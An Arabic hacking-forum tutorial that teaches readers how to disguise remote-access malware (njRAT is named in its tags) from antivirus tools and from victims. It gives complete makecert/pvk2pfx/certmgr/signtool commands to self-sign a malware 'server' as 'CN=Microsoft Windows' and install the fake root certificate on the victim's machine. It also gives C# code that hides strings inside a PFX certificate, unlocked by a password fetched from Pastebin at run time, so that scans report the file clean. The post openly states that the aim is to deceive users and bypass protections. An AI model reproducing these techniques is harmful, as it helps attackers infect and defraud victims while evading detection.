29.10.2017 Sign Your Client Digitally + Store It Inside PFX Cert -Completely Hidden


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
2,868
3,983
1
حياكم الله ياشباب
الله يعيني على كتابة الموضوع بس رح اختصر لان بالفديو شرحت كل شيء
الشباب نزلو هنا
Files Signature Detector v1.0
اداة لفحص اي تطبيق ان كان موقع رقميا ام لا وان كان موقع
هل هو توقيع اروجنال ام مزيف fake
المهم اول ماشفت اكواد البرنامج وانه بيعتمد على باور شيل



اي ان التحقق من الملف سيتم عن طريق الباور شيل واستخدام
C#:
Get-AuthenticodeSignature
ن الملف سيتم عن طريق الباور شيل واستخدام
كود C#
1
Get-AuthenticodeSignature

تستطيع ايضا يدويا القيام بذلك
المهم اول محاولاتي كانت على البرنامج انني رحت افهم كيفية انتاج او الحصول على توقيع رقمي
بدون اطالة النتيجة ان بتفحص سيرفرك بالبرنامج هيه




مش موقع بالطبع
وان منطبق طريقتي



وبالباور شيل عند التشييك على التوقيع :15:




وعند استخدام Process Hacker




تعذر التحقق من الملف بسبب إعدادات الأمان :15:
could not be verified due to security settings
خليناه يصير موقع والتوقيع مش معروف ان اصلي او مزيف > ضيعناهم :15:
يعني رح علمكم طريقة توقيع السيرفر وهالشي يعني تجاوز لبعض الحمايات
الشرح لتوقيع سيرفرك بالمرفقات بعنوان sign

################################
تعديل لجعل التوقيع يصير اروجنال
فقط ملاحظة قبل البدء وهي
اضف timestamp للسيرر عن طريق
signtool timestamp -t http://timestamp.verisign.com/scripts/timstamp.dll MyControl.exe
وايضا يجب تسجيل الشهادة بالجهاز الهدف لجعل الشهادة اصلية تماما
certmgr.exe -add -c Root.cer -s -r localmachine root
فقط اضف التايمستامب بجهازك للسيرفر
وعند الضحية لازم انك تسجل الشهادة بجهازه ..

#############################

كيفية تجاوز الفاحصين, تجاوز أعتى الحمايات, كيف الغم بالتورنت, تجاوز الفاحصين, تلغيمة جبارة, التلغيم بالتورنت, كيفية تجاوز الفاحصين, تلغيم و ضحايا, كيف ادمج, كيف اجلب ضحايا؟, تلغيم وتخطي الفاحصين, تخطي الفاحصين, , كيفية جلب الضحايا, تلغيمة مستحيلة الكشف, كيف ألغم, تلغيم انجرات, كيفية التلغيم, دمج و تلغيم, كيفية التلغيم الاحترافي, دمج لا يكشف التشفيرة, تلغيمة قوية, التلغيم الكلين, التلغيمة القاتلة, كيف أتجاوز الفاحصين, كيفية التلغيم, التلغيم الدموي, تلغيم المواقع, تلغيمة صعبة الكشف, اختراق الفاحصين, ما هو التلغيم, كيف أتجاوز الفاحصين؟, njrat حقن, كيف ألغم باحترافية, تجاوز الحمايات والفاحصين, كيفية التلغيم البرمجي, ضحايا اجانب, كيف اجلب ضحايا, njrat تلغيم, كيف اجلب ضحايا اجانب, كيفية جلب الضحاياكيف تتخطى الفاحصين, كيف ألغم بطريقة احترفية, جلب ضحايا اجانب, Torrent تلغيم, التلغيم و جلب الضحايا, طريقة التلغيم و جلب الضحايا, جلب ضحايا, تلغيمة دموية, دمج برنامج مع السيرفر, كيف ألغم, تلغيم برمجي, تلغيمة قوية, التلغيم, تلغيم المواقع الاجنبية, تجاوز الحمايات, كيفية جلب الضحايا من التورنت, التلغيم البرمجي , التلغيم بالتورنت و جلب الضحايا, حقن سيرفر ببرنامج, دمج و تلغيم كلين,توقيع السيرفر,sign digitally,sign,sign server,توثيق السيرفر
بايلود,تشفير,تشفير البايلود,تشفير البايلود كلين,تشفير بايلود الميتا,ميتا,توقيع البايلود,
حياكم الله ياشباب
اول شيء اسف لان هذا اخر موضوع لي بيكون
عندي ظروف شخصية لحتى تنحل مارح اقدر اشارك
ولو انني ماوعدت بالموضوع اللي نزلته من قبل وحذفته
انني رح انزل لكم طريقة حصول سيرفرك/ بايلودك على توقيع اصلي
ماكنت بنزل الموضوع هذا ..
بس فقط عشان التحدي اللي صار وعشان انني وعدت
المصدر والادوات بتشوفوها بالرابط هنا
GitHub - 3gstudent/signtools: From Windows SDK
ياريت الكل وقت بيجيب طريقة من اي مكان او بيستعين باي مصدر
انه يذكرها .. لان ماحلوة بحقك تذكر انك جبت طريقة
وتطلع ناسخها او ناقلها من مكان او حتى لو معدل عليها
اذكر بشو استعنت ..هالشي رح يزيد مكانتك مش رح ينزلها
وهالشي رح يفيد باثراء المحتوى العربي ..بس للاسف للان
الكل بيتضحك على نفسه وبيقول انه سوا وعمل وهوة بيعرف انه مش صحيح
طبعا ماكان احد بيعرف هذه الطريقة او عالاقل مااحد طرحها
انا وقعت سيرفري ببشهادة اصلية جبتها ..
اما عشان الطريقة هنا تم نشرها من شهر لهيك رح ارفقها واحتفظ بالشهادة العندي ..

جميع ماستحتاجه من اوامر تجدها هنا
والملفات اللازمة بالرابط فوق
C#:
C:\Windows\System32\consent.exe
Get-AuthenticodeSignature .\Client.exe
signtool.exe verify /v C:\Windows\System32\consent.exe
signtool.exe verify /v C:\Users\h-a-c\Desktop\Sign\Client.exe
sigcheck.exe -q C:\Windows\System32\consent.exe /accepteula
sigcheck.exe -q C:\Users\h-a-c\Desktop\Sign\Client.exe
makecert -n "CN=Microsoft Windows" -r -sv Root.pvk Root.cer
cert2spc Root.cer Root.spc
pvk2pfx -pvk Root.pvk -pi BasharBachir -spc Root.spc -pfx Root.pfx -f
certmgr.exe -add -c Root.cer -s -r localmachine root
signtool sign /f Root.pfx /p BasharBachir Client.exe
توقيع سيرفرك بتوقيع رقمي اصلي يعني انك رح تتجاوز بعض الحمايات
اللي صار عندها تحسس من الملفات الغير موقعة
ورح يساعدك بخداع المستخدم لان ملفك موثوق
ويكفيك ان الشرح هذا مش موجود باي منتدى عربي حسب ماشفت..
وبكفيك انك مش كنت قادر على انك توقع سيرفرك من قبل
والان تقدر وبسهولة























اسف نسيت الصوت كان ملغى بالفديو مارح اقدر اصور مرة ثانية
لمشاهدة الفديو من المرفقات بعنوان get
المهم خلال تعرفي على انواع الشهادات وكيفية الحصول على شهادة رقمية
شفت عدة برامج عالويندوز وعلى الاندرويد تقوم بذلك
فمثلا هنا برنامجنا على اندرويد




فقلت لماذا لانقوم بوضع سترينج نحن نريده مكان YourName او اي مكان اخر
ومن ثم نستدعيه بالسي شارب او اي لغة اخرى
وهذا ماحصل ولكن هنالك مشكلة انه رح يعطيك نفس السترينج اللي خزنته
سواءا اكان بيس64 او هكس سترينج او باينري سترينج او نمبر سترينج
رح يعطيك قبلهم
C#:
CN=
طبعا يتم التجاوز بعدة طرق انا اخترت
C#:
Substring
حيث قمت بتجاوز اول 3 محارف من السترينج الكلي
C#:
Substring(3, cert.Subject.Length - 3)
نتيجة الفحص لكل من السورس والشهادة اي ملف pfx
كلين
Multiple results - Jotti's malware scan


تم الاعتماد على الموضوع هنا
HacK With Numbers Clean All + Windows Defender
كمثال فقط
الفكرة هي تخزين سترينج بداخل الشهادة وعدم المقدرة ابدا حسب ماتعلمت اليوم انه احد يستخرج السترينج
الا ان يعلم الباس ورد
اذ يجب تعريف متغيرين وهما
C#:
string certPath = "yourCertificate.pfx";
            string certPass = Microsoft().Result;
الاول اسم الشهادة مع الامتداد والمسار بالطبع والثاني الباس ورد
انت عند التلغيم لاتضع الباس ورد في الرابط الذي سيتم جلب محتواه عن طريق الفانكشن
C#:
public static async Task<string> Microsoft()
        {
            using (HttpClient client = new HttpClient())
            {
                var result = await client.GetStringAsync("https://pastebin.com/raw/E9j0gYFb"); return result;
            }
        }
الفانكشن استخدمناها كثيرا في مواضيعنا مرة نجلب سترينج ومرة نجلب بايت ونعدل المطلوب
يعني خلي بالرابط اللي رح تضعه اي كلام اول ماترفق التلغيمة
C#:
https://pastebin.com/raw/E9j0gYFb
ووقت تريد تشغلها ضع كلمة السر التي وضعتها عند انشائك للشهادة
والتشفير رح يكون حسب تطبيق الاندرويد AES256 بسعة 2048 RSA
يعني انسى احد يشوف مابداخل الشهادة ان لم يعرف كلمة السر
برجع بقول الموضوع لاتعتمد عليه بنفس السورس ونفس الاستخدام
الخلاصة معك سترينج وش ماكان نوعه وش ماكان استخدامه وتريد تخفيه وتشفره بحيث مااحد يوصله
والناتج الخاص بسورسك كلين لعدم احتوائه على هذا السترينج الذي كان سبب كشفه
بتستخدم الطريقة هنا
لمشاهدة الشرح من المرفقات بعنوان hideall

 

المرفقات

  • أعجبني
التفاعلات: ahmederaqi